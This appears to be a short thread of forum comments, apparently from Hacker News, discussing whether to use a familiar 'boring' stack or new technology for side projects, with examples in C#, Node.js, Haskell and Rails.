If you are doing a side project you can choose between solving a real problem or learning new tech. It is hard to do both simultaneously in the time that most people give to side projects. Hell its hard even if you are full time.

Learning new tech in a side project is a worthy thing to do and I have built some nice little toy Haskell, Elm, JS and Java projects.

However I am more productive in my usual C#, so if I wanted to get something done quick e.g. an MVP website, I'd probably that would be the best choice despite the advantages of other languages. E.g. PHP -> cheap shared hosting, easy to deploy, Haskell -> Excellent type system, find most bugs at compile time, etc.

One exception is I recently want to scrape the HN Api sequentially with multiple requests at a time, and I found this easier on Node.js than C#, because I could be sure I wouldn't get exceptions saying my threadpool has run out of threads etc. :-)

Maybe yes, when you work at bank, change 1 line of code per month, documenting this change in 10 Word documents, most of time drinking coffee and sleeping during Powerpoint presentations with 1000 attendees.

It depends on if you like the boring stack, and also what your normal stack is. If you mostly write ruby, Sinatra or Rails should be your first port of call: they're widely used frameworks in your language.

But no, don't go for the zeitgeist for no reason: zeitgiest is tautologically new, and new stuff tends to break a lot.